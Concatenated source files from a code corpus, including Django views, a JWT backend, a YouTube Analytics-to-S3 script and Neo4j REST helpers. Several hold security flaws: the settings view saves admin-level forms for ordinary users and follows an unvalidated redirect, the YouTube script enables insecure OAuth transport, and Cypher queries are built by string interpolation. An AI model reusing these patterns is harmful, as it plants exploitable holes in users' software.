settings(request):\n 
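# one view handles three settings forms: listener, app-wide and site-wide\n 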
current_site_settings = get_current_site(request)\n current_podcasts_settings = current_site_settings.podcastssettings\n if request.method == 'POST':\n listener_form = ListenerSettingsForm(\n request.POST,\n request.FILES,\n instance=request.user.listener,\n prefix='listener')\n app_admin_form = AdminSettingsForm(\n request.POST,\n request.FILES,\n instance=current_podcasts_settings,\n prefix='app')\n site_admin_form = SiteSettingsForm(\n request.POST,\n request.FILES,\n instance=current_site_settings,\n prefix='site')\n\n if listener_form.is_valid() and (not request.user.is_superuser or (app_admin_form.is_valid() and site_admin_form.is_valid())):\n listener_form.save()\n app_admin_form.save()\n site_admin_form.save()\n\n next = request.GET.get('next', '/')\n return redirect(next)\n else:\n listener_form = ListenerSettingsForm(\n instance=request.user.listener,\n prefix='listener')\n app_admin_form = AdminSettingsForm(\n instance=current_podcasts_settings,\n prefix='app')\n site_admin_form = SiteSettingsForm(\n instance=current_site_settings,\n prefix='site')\n\n return render(request, 'podcasts-settings.html', {'listener_form': listener_form,\n 'app_admin_form': app_admin_form,\n 'site_admin_form': site_admin_form})\n","sub_path":"podcasts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
+{"seq_id":"11037398","text":"##\n## Print the maximum and minimum value for each letter of column 1.\n##\n## A,9,1\n## B,9,1\n## C,9,0\n## D,7,1\n## E,9,1\n##\ntxt = open('data.csv','r').readlines()\ntxt = [row[0:-1]for row in txt]\ntxt = [line.replace('\\\t','')for line in txt]\nc = sorted(set([row[0]for row in txt]))\ns = [[row[0],row[1]]for row in txt]\naa = 0\nfor i in c:\n aa = [row[1] for row in s[:]if row[0]==i]\n maximo = max(aa)\n minimo = min(aa)\n print(i+','+maximo+','+minimo)\n \n","sub_path":"q05.py","file_name":"q05.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
+{"seq_id":"205811738","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*- #\nfrom __future__ import unicode_literals\n\nAUTHOR = u'tu1978'\nSITENAME = u'思いつきメモ'\nSITEURL = 'https://formalism.github.io/blog/'\n\nPATH = 'content'\n\nTIMEZONE = 'Asia/Tokyo'\n\nDEFAULT_LANG = u'en'\n\n# Feed generation is usually not desired when developing\nFEED_ALL_ATOM = None\nCATEGORY_FEED_ATOM = None\nTRANSLATION_FEED_ATOM = None\nAUTHOR_FEED_ATOM = None\nAUTHOR_FEED_RSS = None\n\nSLUGIFY_SOURCE = 'basename'\n\nARTICLE_URL = 'posts/{date:%Y}/{date:%m}/{slug}/'\nARTICLE_SAVE_AS = 'posts/{date:%Y}/{date:%m}/{slug}/index.html'\nPAGE_URL = 'pages/{date:%Y}/{date:%m}/{slug}/'\nPAGE_SAVE_AS = 'pages/{date:%Y}/{date:%m}/{slug}/index.html'\n\nTHEME = \"./pelican-themes/bootstrap\"\n\nDISPLAY_PAGES_ON_MENU = True\nNEWEST_FIRST_ARCHIVES = True\n\nGOOGLE_ANALYTICS = True\n\n#SUMMARY_MAX_LENGTH = None\n\n# Blogroll\n# LINKS = (('Pelican', 'http://getpelican.com/'),\n# ('Python.org', 'http://python.org/'),\n# ('Jinja2', 'http://jinja.pocoo.org/'),\n# ('You can modify those links in your config file', '#'),)\n\n# Social widget\nSOCIAL = (('twitter', 'http://twitter.com/tu1978'),)\n\nDEFAULT_PAGINATION = 10\n\n# Uncomment following line if you want document-relative URLs when developing\n#RELATIVE_URLS = True\n\nUSE_FOLDER_AS_CATEGORY = 
False\n\nTWITTER_USERNAME=\"@tu1978\"\n","sub_path":"pelicanconf.py","file_name":"pelicanconf.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"630741122","text":"import asyncio\nfrom datetime import datetime, timedelta\nfrom typing import Optional\n\nimport jwt\n\nfrom authx.core.config import JWT_ALGORITHM\nfrom authx.database import RedisBackend\n\n\nclass JWTBackend:\n \"\"\"\n Setup the JWT Backend with the given cache backend and private key.\n \"\"\"\n\n def __init__(\n self,\n cache_backend: RedisBackend,\n private_key: Optional[bytes],\n public_key: bytes,\n access_expiration: int,\n refresh_expiration: int,\n ) -> None:\n self._cache = cache_backend\n self._private_key = private_key\n self._public_key = public_key\n self._access_expiration = access_expiration\n self._refresh_expiration = refresh_expiration\n\n async def _active_blackout_exists(self, iat: datetime) -> bool:\n blackout = await self._cache.get(\"users:blackout\")\n if blackout is not None:\n blackout_ts = datetime.utcfromtimestamp(int(blackout))\n return blackout_ts >= iat\n else:\n return False\n\n async def _user_in_blacklist(self, id: int) -> bool:\n in_blacklist = await self._cache.get(f\"users:blacklist:{id}\")\n return bool(in_blacklist)\n\n async def _user_in_logout(self, id: int, iat: datetime) -> bool:\n ts = await self._cache.get(f\"users:kick:{id}\")\n if ts is not None:\n logout_ts = datetime.utcfromtimestamp(int(ts))\n return logout_ts >= iat\n else:\n return False\n\n async def decode_token(self, token: str, leeway: int = 0) -> Optional[dict]:\n if token:\n try:\n payload = jwt.decode(\n token,\n self._public_key,\n leeway=leeway,\n algorithms=JWT_ALGORITHM,\n )\n id = payload.get(\"id\")\n iat = datetime.utcfromtimestamp(int(payload.get(\"iat\")))\n checks = await asyncio.gather(\n *(\n self._active_blackout_exists(iat),\n self._user_in_blacklist(id),\n self._user_in_logout(id, iat),\n )\n )\n if any(checks):\n return None\n\n return payload\n except: # noqa E722\n return None\n return None\n\n def _create_token(\n self, payload: dict, token_type: str, expiration_delta: Optional[int] = None\n ) -> str:\n iat = datetime.utcnow()\n if expiration_delta:\n exp = datetime.utcnow() + timedelta(seconds=expiration_delta)\n else:\n exp = datetime.utcnow() + timedelta(seconds=60)\n\n payload.update({\"iat\": iat, \"exp\": exp, \"type\": token_type})\n token = jwt.encode(payload, self._private_key, algorithm=JWT_ALGORITHM)\n if isinstance(token, bytes):\n # For PyJWT <= 1.7.1\n return token.decode(\"utf-8\")\n # For PyJWT >= 2.0.0a1\n return token\n\n def create_access_token(self, payload: dict) -> str:\n return self._create_token(payload, \"access\", self._access_expiration)\n\n def create_refresh_token(self, payload: dict) -> str:\n return self._create_token(payload, \"refresh\", self._refresh_expiration)\n\n def create_tokens(self, payload: dict) -> dict:\n access = self.create_access_token(payload)\n refresh = self.create_refresh_token(payload)\n\n return {\"access\": access, \"refresh\": refresh}\n","sub_path":"authx/core/jwt.py","file_name":"jwt.py","file_ext":"py","file_size_in_byte":3494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"71031183","text":"# coding: utf-8\n\nimport os\nimport os.path\nimport numpy as np\nimport pickle\nimport cv2\n\nurl_mnist = 'http://yann.lecun.com/exdb/mnist/'\ndata_file = os.path.dirname(os.path.abspath(__file__)) + 
\"/mnist.pkl\"\n\nn_train = 60000\nn_test = 10000\ndim_img = (1, 28, 28)\nsize_img = 784\n\ndef load_mnist(normalize=True, flatten=True, one_hot_label=False):\n \"\"\" Load and preprocess MNIST dataset \n Parameters:\n - normalize: normalize image pixel values between 0.0 and 1.0\n - one_hot_label: \n True: one_hot_label is returned as one-hot array\n ** One_hot array: ex) [0,0,0,0,1,0,0,0,0]\n - flatten: convert images into one dimensional array\n\n Returns: (training image, trainign label), (test image, test label)\n \"\"\"\n with open(data_file, 'rb') as f: # 'rb': open a file in binary format\n dataset = pickle.load(f)\n\n if normalize:\n for key in ('train_img', 'test_img'):\n dataset[key] = dataset[key].astype(np.float32)\n dataset[key] /= 255.0\n\n if one_hot_label:\n dataset['train_label'] = _change_one_hot_label(dataset['train_label'])\n dataset['test_label'] = _change_one_hot_label(dataset['test_label'])\n\n if not flatten:\n for key in ('train_img', 'test_img'):\n dataset[key] = dataset[key].reshape(-1, 1, 28, 28)\n\n return (dataset['train_img'], dataset['train_label']), (dataset['test_img'], dataset['test_label'])\n\n\ndef _change_one_hot_label(X):\n T = np.zeros((X.size, 10))\n for idx, row in enumerate(T):\n row[X[idx]] = 1\n\n return T\n\nif __name__ == '__main__':\n print('This is a module for preprocessing MNIST dataset')","sub_path":"dataset/preprocess_mnist.py","file_name":"preprocess_mnist.py","file_ext":"py","file_size_in_byte":1658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"484504599","text":"import os\nimport argparse\nimport pandas as pd\nimport boto3\nimport logging\nimport datetime\nfrom googleapiclient.discovery import build\nfrom oauth2client import client\nfrom oauth2client import tools\nfrom oauth2client.file import Storage\n\nSCOPES = ['https://www.googleapis.com/auth/yt-analytics.readonly']\nAPI_SERVICE_NAME = 'youtubeAnalytics'\nAPI_VERSION = 'v2'\n\nCLIENT_SECRETS_FILE = '/Users/scoyne/Documents/GitHub/lib-global-analytics/Secrets/client_secret.json'\nCLIENT_AUTH_TOKEN = '/Users/scoyne/Documents/GitHub/lib-global-analytics/Secrets/youtube_reporting_credentials.json'\nCOLUMNS = ['audienceWatchRatio', 'relativeRetentionPerformance', 'views']\n\n\nS3_BUCKET = 'teamanalytics'\nTODAY = datetime.datetime.now()\nDEFAULT_START_DATE = '2010-01-01'\nDEFAULT_END_DATE = TODAY\nFILE_NAME = 'youtube_reporting_by_video_{}.csv'.format(TODAY)\n\n# setup logging\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\n\ndef valid_date(s):\n try:\n return datetime.datetime.strptime(s, \"%Y-%m-%d\")\n except ValueError:\n msg = \"Not a valid date: '{0}'.\".format(s)\n raise argparse.ArgumentTypeError(msg)\n\n\ndef get_parser():\n # parse arguments\n parser = argparse.ArgumentParser(\n description=\"Automatically generate youtube analytics report and upload to S3\"\n )\n parser.add_argument(\n \"--start_date\",\n action=\"store\",\n dest=\"start_date\",\n type=valid_date,\n help=\"The start date of the youtube report, format must be yyyy-mm-dd\",\n default=DEFAULT_START_DATE,\n )\n parser.add_argument(\n \"--end_date\",\n action=\"store\",\n dest=\"end_date\",\n type=valid_date,\n help=\"The end date of the youtube report, format must be yyyy-mm-dd\",\n default=DEFAULT_END_DATE,\n )\n return parser\n\n\ndef upload_to_s3(inputFile, outputFile, bucket):\n logger.info(\"Start upload to S3 process\")\n # Create an S3 client\n s3 = boto3.client('s3')\n # Uploads the given file using a managed 
uploader, which will split up large\n # files automatically and upload parts in parallel.\n s3.upload_file(inputFile, bucket, outputFile)\n logger.info(\"End upload to S3 process\")\n\n\ndef get_authenticated_service():\n logger.info(\"Start authentication process\")\n\n credential_path = CLIENT_AUTH_TOKEN\n store = Storage(credential_path)\n credentials = store.get()\n if not credentials or credentials.invalid:\n flow = client.flow_from_clientsecrets(CLIENT_SECRETS_FILE, SCOPES)\n credentials = tools.run_flow(flow, store)\n\n logger.info(\"End authentication process\")\n return build(API_SERVICE_NAME, API_VERSION, credentials=credentials)\n\n\ndef execute_api_request(client_library_function, **kwargs):\n result = client_library_function(**kwargs).execute()\n return result\n\n\ndef save_report_to_csv(result, columns, filename):\n logger.info(\"Start save to csv process\")\n data = result['rows']\n header = ['video'] + columns\n df = pd.DataFrame(data, columns=header)\n df.to_csv(filename)\n logger.info(\"End save to csv process\")\n\n\ndef main(args):\n startDate = args.start_date.date()\n endDate = args.end_date.date()\n\n # Disable OAuthlib's HTTPs verification when running locally.\n # *DO NOT* leave this option enabled when running in production.\n os.environ['OAUTHLIB_INSECURE_TRANSPORT'] = '1'\n\n youtubeAnalytics = get_authenticated_service()\n\n stringColumns = \",\".join(COLUMNS)\n\n report = execute_api_request(\n youtubeAnalytics.reports().query,\n ids='channel==MINE',\n startDate=startDate,\n endDate=endDate,\n metrics=stringColumns,\n dimensions='video==Nl5ELeRtrcY',\n )\n\n save_report_to_csv(report, COLUMNS, FILE_NAME)\n\n outputFile = 'analytics_report/marketing/youtube/{}'.format(FILE_NAME)\n upload_to_s3(FILE_NAME, outputFile, S3_BUCKET)\n\n\nif __name__ == \"__main__\":\n main(get_parser().parse_args())\n","sub_path":"youtube_video_report.py","file_name":"youtube_video_report.py","file_ext":"py","file_size_in_byte":3939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"44934763","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('app', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Category',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(help_text=b'This is used in the admin only', max_length=200)),\n ('status', models.IntegerField(default=1, help_text=b'What is the status of this object', max_length=1, choices=[(0, b'DISABLED'), (1, b'LIVE'), (2, b'STAGED'), (3, b'DELETED')])),\n ('slug', models.SlugField(help_text=b'This must be unique, if you leave this blank a slug will be generated', null=True, blank=True)),\n ('date_created', models.DateTimeField(auto_now_add=True, null=True)),\n ('title', models.CharField(help_text=b'', max_length=500, null=True, blank=True)),\n ],\n options={\n 'abstract': False,\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='thing',\n name='category',\n field=models.ForeignKey(blank=True, to='app.Category', null=True),\n preserve_default=True,\n ),\n ]\n","sub_path":"app/migrations/0002_auto_20150313_1948.py","file_name":"0002_auto_20150313_1948.py","file_ext":"py","file_size_in_byte":1417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} 
+{"seq_id":"101652971","text":"import ddtrace\n\n\ndef get_correlation_ids(tracer=None):\n \"\"\"Retrieves the Correlation Identifiers for the current active ``Trace``.\n This helper method can be achieved manually and should be considered\n only a shortcut. The main reason is to abstract the current ``Tracer``\n implementation so that these identifiers can be extracted either the\n tracer is an OpenTracing tracer or a Datadog tracer.\n\n OpenTracing users can still extract these values using the ``ScopeManager``\n API, though this shortcut is a simple one-liner. The usage is:\n\n from ddtrace import helpers\n\n trace_id, span_id = helpers.get_correlation_ids()\n\n :returns: a tuple containing the trace_id and span_id\n \"\"\"\n # Consideration: currently we don't have another way to \"define\" a\n # GlobalTracer. In the case of OpenTracing, ``opentracing.tracer`` is exposed\n # and we're doing the same here for ``ddtrace.tracer``. Because this helper\n # must work also with OpenTracing, we should take the right used ``Tracer``.\n # At the time of writing, it's enough to support our Datadog Tracer.\n\n # If no tracer passed in, use global tracer\n if not tracer:\n tracer = ddtrace.tracer\n\n # If tracer is disabled, skip\n if not tracer.enabled:\n return None, None\n\n span = tracer.current_span()\n if not span:\n return None, None\n return span.trace_id, span.span_id\n","sub_path":"ddtrace/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":1414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"162960937","text":"from django.http import HttpResponse, HttpResponseRedirect\nfrom django.shortcuts import render\nfrom django.contrib import messages\nfrom datetime import datetime\nfrom django.views import View\nfrom systemconfig.models import Country\nfrom systemconfig.forms.country_form import *\n\n\nclass addCountry(View):\n form_class = CountryForm\n\n def get(self, request):\n page_title = \"Add New Country\"\n form = self.form_class\n return render(request, 'country/countryform.html', {'form': form, 'page_title': page_title})\n\n\nclass saveCountry(View):\n form_class = CountryForm\n\n def post(self, request):\n if request.method == 'POST':\n page_title = \"Add New Country\"\n form = self.form_class(request.POST)\n if form.is_valid():\n obj = Country()\n obj.country_name = form.cleaned_data['country_name']\n obj.status = form.cleaned_data['status']\n obj.created_by = request.user.id\n obj.created_at = datetime.now()\n obj.save()\n messages.success(request, 'Country details saved successfully..!')\n return HttpResponseRedirect('/admin/list/country')\n\n else:\n form = self.form_class()\n messages.error(request, 'Error..!')\n return render(request, 'country/countryform.html', {'form': form, page_title: 'page_title'})\n\n\nclass editCountry(View):\n def get(self, request, **kwargs):\n page_title = \"Edit Country\"\n\n country_details = Country.objects.get(id=self.kwargs['edit_id'])\n form_class = CountryForm\n if request.method == 'POST':\n form = form_class(request.POST)\n else:\n form = form_class()\n return render(request, 'country/countryform.html',\n {'form': form, 'page_title': page_title, 'country_details': country_details})\n\n\nclass updateCountry(View):\n form_class = CountryForm\n\n def post(self, request, **kwargs):\n id = request.POST.get('id')\n form = self.form_class(request.POST)\n if form.is_valid():\n country_name = form.cleaned_data['country_name']\n status = form.cleaned_data['status']\n updated_by 
= request.user.id\n updated_at = datetime.now()\n Country.objects.filter(id=id).update(country_name=country_name, status=status, updated_by=updated_by,\n updated_at=updated_at)\n messages.success(request, 'Country details updated successfully..!')\n return HttpResponseRedirect('/admin/list/country')\n return HttpResponse(\"UpdateCountry\")\n","sub_path":"systemconfig/views/country.py","file_name":"country.py","file_ext":"py","file_size_in_byte":2675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"10868989","text":"import pygame\nfrom pygame.locals import *\n\npygame.init()\n\npygame.mixer.music.load(\"Suoni/colonnaSonora.mp3\")\npygame.mixer.music.play(-1) #play della colonna sonora\npygame.mixer.music.set_volume(0.6)\n\n#creo suono click\nsound1 = pygame.mixer.Sound(\"Suoni/click.wav\")\n\n#aggiorno lo schermo\npygame.display.flip()\n\n#ciclo while che si chiude quando l'utente chiude il programma\ndone = False\nwhile not done:\n for ev in pygame.event.get():\n if ev.type == QUIT: # chiusura del programma\n done = True\n elif ev.type == MOUSEBUTTONDOWN: # click del mouse\n click=ev.pos\n tastoMouse=ev.button\n if tastoMouse==1:\n sound1.play() #play suono click\n # if ButtonMuto.collidepoint(click) and tastoMouse==1:\n # pygame.mixer.music.fadeout(5000) #si ferma la colonna sonora\n\n\n\n\n\n\n\n\n \n\n\n\n\n\n\n\n\n\n\n","sub_path":"giocoV0.2/Suoni/suoni.py","file_name":"suoni.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"214726965","text":"import cv2\nimport os\n\n\nclass FileCapture:\n def __init__(self, im_dir):\n self.open(im_dir)\n\n def isOpened(self):\n return self._imgs is not None\n\n def read(self):\n if not self.isOpened():\n return False, None\n\n # read files until an image is loaded\n im = None\n while len(self._imgs) > 0 and im is None:\n # not empty image list and no image is read\n im = cv2.imread(os.path.join(self._im_dir, self._imgs[0]), -1)\n del self._imgs[0]\n\n return im is not None, im\n\n def open(self, im_dir):\n if os.path.isdir(im_dir):\n self._im_dir = im_dir\n self._imgs = [f for f in os.listdir(self._im_dir)\n if os.path.isfile(os.path.join(self._im_dir, f))]\n self._imgs.sort()\n else:\n self._imgs = None\n","sub_path":"captures.py","file_name":"captures.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"8759907","text":"#!/usr/bin/env python3\n\nimport requests\nimport json\nimport warnings\nimport re\nimport time\nfrom datetime import datetime, timedelta\nimport math\n#import token\nimport argparse\n\n\n'''\nCreated on 4 Feb 2016\n\nTools for connecting to the neo4j REST API\n\n@author: davidos\n'''\n\n#Could also use py2neo, but this is a bit heavy duty for some uses\n\n\ndef cli_credentials():\n \"\"\"Parses command line credentials for Neo4J rest connection;\n Optionally specifcy additional args as a list of dicts with\n args required by argparse.add_argument(). 
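A hypothetical driver loop for the FileCapture class in the captures.py sample above, mirroring the cv2.VideoCapture read() protocol it imitates; the frames/ directory is a placeholder path.

cap = FileCapture("frames/")   # directory of image files, placeholder path
while cap.isOpened():
    ok, frame = cap.read()
    if not ok:                 # file list exhausted (or only unreadable files left)
        break
    print(frame.shape)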
Order in list\n specified arg order\"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument(\"endpoint\",\n help=\"Endpoint for connection to neo4J prod\")\n parser.add_argument(\"usr\",\n help=\"username\")\n parser.add_argument(\"pwd\",\n help=\"password\")\n# if additional_args:\n# for a in additional_args:\n# parser.add_argument(**a) # how to get this to work with non kewyord args\n return parser.parse_args()\n\ndef cli_neofj_connect():\n args = cli_credentials()\n return neo4j_connect(base_uri=args.endpoint,\n usr=args.usr,\n pwd=args.pwd)\n\n\ndef chunks(l, n):\n \"\"\"Yield successive n-sized chunks from l.\"\"\"\n for i in range(0, len(l), n):\n yield l[i:i+n]\n \n\n \nclass neo4j_connect():\n \"\"\"Thin layer over REST API to hold connection details, \n handle multi-statement POST queries, return results and report errors.\"\"\"\n # Return results might be better handled in the case of multiple statements - especially when chunked.\n # Not connection with original query is kept.\n \n \n def __init__(self, base_uri, usr, pwd):\n self.base_uri=base_uri\n self.usr = usr\n self.pwd = pwd\n self.commit = \"/db/neo4j/tx/commit\"\n self.headers = {'Content-type': 'application/json'}\n if not self.test_connection():\n print(\"Falling back to Neo4j v3 connection\")\n self.commit = \"/db/data/transaction/commit\"\n self.headers = {}\n self.test_connection()\n \n def commit_list(self, statements, return_graphs = False):\n \"\"\"Commit a list of statements to neo4J DB via REST API.\n Prints requests status and warnings if any problems with commit.\n - statements = list of cypher statements as strings\n - return_graphs, optionally specify graphs to be returned in JSON results.\n Errors prompt warnings, not exceptions, and cause return = FALSE.\n Returns results list of results or False if any errors are encountered.\"\"\"\n cstatements = []\n if return_graphs:\n for s in statements:\n cstatements.append({'statement': s, \"resultDataContents\" : [ \"row\", \"graph\" ]})\n else: \n for s in statements:\n cstatements.append({'statement': s}) # rows an columns are returned by default.\n payload = {'statements': cstatements}\n response = requests.post(url = \"%s%s\" \n % (self.base_uri, self.commit), auth = (self.usr, self.pwd) ,\n data = json.dumps(payload), headers = self.headers)\n if self.rest_return_check(response):\n return response.json()['results']\n else:\n return False\n \n \n def commit_list_in_chunks(self, statements, verbose=False, chunk_length=1000):\n \"\"\"Commit a list of statements to neo4J DB via REST API, split into chunks.\n cypher_statments = list of cypher statements as strings\n base_uri = base URL for neo4J DB\n Default chunk size = 1000 statements. This can be overridden by KWARG chunk_length.\n Returns a list of results. Output is indistinguishable from output of commit_list (i.e. 
\n chunking is not reflected in results list).\n \"\"\"\n chunked_statements = chunks(l = statements, n=chunk_length)\n chunk_results = []\n i = 1\n c_no = math.ceil(len(statements)/chunk_length)\n for c in chunked_statements:\n if verbose:\n start_time = time.time()\n print(\"Processing chunk of %d of %d starting with: %s\" % (i,\n c_no, \n c[0].encode('utf8')))\n r = self.commit_list(c)\n if verbose:\n t = time.time() - start_time\n print(\"Processing took %d seconds for %s statements\" % (t, len(c)))\n print(\"Estimated time to completion: %s.\" % str(timedelta(seconds=(t*(c_no - i)))))\n if type(r) == list:\n chunk_results.extend(r)\n else:\n chunk_results.append(r)\n i += 1\n return chunk_results\n\n def commit_csv(self, url, statement, chunk_size=1000, sep=\",\"):\n # May need some configuration to work with file://...\n cypher = \"USING PERIODIC COMMIT %d \" \\\n \"LOAD CSV WITH HEADERS FROM '%s' AS line FIELDTERMINATOR '%s' \" \\\n \"%s\" % (chunk_size, url, sep, statement)\n self.commit_list([cypher])\n\n def rest_return_check(self, response):\n \"\"\"Checks status response to post. Prints warnings to STDERR if not OK.\n If OK, checks for errors in response. Prints any present as warnings to STDERR.\n Returns True STATUS OK and no errors, otherwise returns False.\n \"\"\"\n if not (response.status_code == 200):\n warnings.warn(\"Connection error: %s (%s)\" % (response.status_code, response.reason))\n return False\n else:\n j = response.json()\n if j['errors']:\n for e in j['errors']:\n warnings.warn(str(e))\n return False\n else:\n return True\n \n def test_connection(self):\n statements = [\"MATCH (n) RETURN n LIMIT 1\"]\n if self.commit_list(statements):\n return True\n else:\n return False\n \n def list_all_node_props(self):\n r = self.commit_list(['MATCH (n) with keys(n) AS kl UNWIND kl as k RETURN DISTINCT k'])\n d = results_2_dict_list(r)\n return [x['k'] for x in d]\n \n def list_all_edge_props(self):\n r = self.commit_list(['MATCH ()-[r]-() with keys(r) AS kl UNWIND kl as k RETURN DISTINCT k'])\n d = results_2_dict_list(r)\n return [x['k'] for x in d]\n \ndef results_2_dict_list(results):\n \"\"\"Takes JSON results from a neo4J query and turns them into a list of dicts.\n \"\"\"\n dc = []\n for n in results:\n # Add conditional to skip any failures\n if n:\n for d in n['data']:\n dc.append(dict(zip(n['columns'], d['row'])))\n return dc\n\ndef escape_string(strng):\n if type(strng) == str:\n strng = re.sub(r'\\\\', r'\\\\\\\\', strng)\n strng = re.sub('\"', '\\\\\"', strng)\n return strng\n\ndef dict_2_mapString(d):\n \"\"\"Converts a Python dict into a cypher map string.\n Only supports values of type: int, float, list, bool, string.\"\"\"\n # Surely one of the fancier libraries comes with this built in!\n map_pairs = []\n for k,v in d.items(): \n if type(v) == (int):\n map_pairs.append(\"%s : %d\" % (k,v))\n elif type(v) == float: \n map_pairs.append(\"%s : %f \" % (k,v)) \n elif type(v) == str:\n map_pairs.append('%s : \"%s\"' % (k, escape_string(v))) \n elif type(v) == list: \n map_pairs.append('%s : %s' % (k, str([escape_string(i) for i in v])))\n elif type(v) == bool:\n map_pairs.append(\"%s : %s\" % (k, str(v))) \n else: \n warnings.warn(\"Can't use a %s as an attribute value in Cypher. 
Key %s Value :%s\" \n % (type(v), k, (str(v))))\n \n return \"{ \" + ' , '.join(map_pairs) + \" }\"\n\nclass neo4jContentMover:\n \"\"\"A wrapper for methods that safely move content between two neo4J databases.\n Limitation: The database being pulled from must be Neo4j 3.n + (2.n lacks\n the properties function used here).\"\"\"\n \n def __init__(self, From, To):\n \"\"\"From: a neo4jConnect object for interacting with a neo4j DB to pull content from (neo 3.n+)\n To: a neo4jConnect object for interacting with a neo4j DB to load content (2.n+)\"\"\"\n self.From = From\n self.To = To\n \n def move_nodes(self, match, key, chunk_length = 2000, verbose = True, test_mode = False):\n \"\"\"match = any match statement in which a node to move is specified with variable n.\n key = attribute used in merge statements to non-redundantly add content. must be present\n in matched nodes.\n Optionally set commit chunk length, verbosity, test mode (limit 100)\n\n WARNING: THIS DEPENDS ON MATCH BETWEEN SETS OF LABELS. => potential danger of duplicate content.\n \"\"\"\n # TODO: modify this so that MERGE does not specify label. Then adds labels string afterwards.\n \n ret = \" RETURN n.%s AS key, labels(n) AS labels , \" \\\n \"properties(n) as properties\" % key\n \n\n if test_mode:\n ret += \" limit 100\" \n results = self.From.commit_list([match + ret]) \n nodes = results_2_dict_list(results)\n s = []\n for n in nodes:\n attribute_map = dict_2_mapString(n['properties'])\n label_string = ':'.join(n['labels'])\n s.append('MERGE (n:%s { %s : \"%s\" }) SET n = %s' % (label_string, \n key, n['properties'][key], \n attribute_map)) \n self.To.commit_list_in_chunks(statements = s,\n verbose = verbose,\n chunk_length = chunk_length)\n \n def move_edges(self, match, node_key, edge_key='', chunk_length=2000,\n verbose=True, test_mode=False, fail_mode = 'soft'):\n \"\"\"\n Identifies edges in 'from' based on match statement;\n Merges identified edges in to 'to' using combination of specified key match and\n neo4j labels of matched nodes.\n match = any match statement in which an edge (triple) is specified with variables s,r,o\n node_key = key used to match/merge to add new content\n Optionally set commit chunk length.\n \"\"\"\n\n ret = \"RETURN s.%s AS subject, labels(s) as slab, type(r) AS reltype, \" \\\n \"properties(r) AS relprops, o.%s AS object, labels(o) AS olab \" % (node_key, node_key)\n if test_mode:\n ret += \" limit 100\"\n results = self.From.commit_list([match + ret])\n if not results:\n if fail_mode == 'hard':\n raise Exception(\"fubar\")\n elif fail_mode == 'soft':\n warnings.warn(\"Commit to KB return false. 
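Assumed end-to-end usage of the neo4j_connect wrapper and the helper functions above; the endpoint, credentials and query are placeholders. The final print shows roughly what dict_2_mapString emits for mixed value types, following the per-type branches in the function.

nc = neo4j_connect("http://localhost:7474", "neo4j", "password")  # placeholders
results = nc.commit_list(["MATCH (n) RETURN n.short_form AS sf LIMIT 3"])
if results:  # commit_list returns False on connection or cypher errors
    for row in results_2_dict_list(results):
        print(row["sf"])

props = {"short_form": "FBbt_00003624", "synonyms": ["DL1", "dorsal lateral 1"], "count": 3}
print(dict_2_mapString(props))
# -> { short_form : "FBbt_00003624" , synonyms : ['DL1', 'dorsal lateral 1'] , count : 3 }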
Likely connection or cypher error.\")\n else:\n edges = results_2_dict_list(results)\n s = []\n for e in edges:\n attribute_map = dict_2_mapString(e['relprops'])\n rel = e['reltype']\n slab_string = ':'+':'.join(e['slab'])\n olab_string = ':'+':'.join(e['olab'])\n if edge_key:\n if edge_key in e['relprops'].keys():\n edge_restriction = \"{ %s : '%s' }\" % (edge_key, e['relprops'][edge_key])\n else:\n # Make this into an exception?\n warnings.warn(\"Matched edge lacks specified edge_key (%s)\" % (edge_key))\n continue\n else:\n edge_restriction = \"\"\n ### Move edge only when subject and object nodes match on keys and labels.\n emerge = \"MATCH (s%s { %s : '%s'}), \" \\\n \" (o%s { %s : '%s'}) \" \\\n \"MERGE (s)-[r:%s %s]->(o) \" % \\\n (slab_string, node_key, e['subject'],\n olab_string, node_key, e['object'],\n rel, edge_restriction\n )\n if e['relprops']:\n emerge = emerge + \"SET r = %s\" % attribute_map\n s.append(emerge)\n self.To.commit_list_in_chunks(statements=s,\n verbose=verbose,\n chunk_length=chunk_length)\n\n def move_node_labels(self, match, node_key, chunk_length=2000, verbose=True):\n \"\"\"match = any match statement in which a node to move is specified with variable n.\n\n Look up labels for all nodes found by specified match in both From and To.\n For any case where a matched node (defined by node_key + shared labels) has labels in From but not To,\n move those labels.\"\"\"\n\n ret = \" return labels(n) as labs, n.%s\" % node_key\n From_results = self.From.commit_list([match + ret])\n To_results = self.To.commit_list([match + ret])\n\n def roll_label_lookup(results):\n dc = results_2_dict_list(results)\n out = {}\n for d in dc:\n out[d['n.%s' % node_key]] = set(d['labs'])\n return out\n\n From_label_lookup = roll_label_lookup(From_results)\n TO_label_lookup = roll_label_lookup(To_results)\n\n statements = set()\n\n for k, from_labels in From_label_lookup.items():\n if k in TO_label_lookup.keys():\n From_only = from_labels - 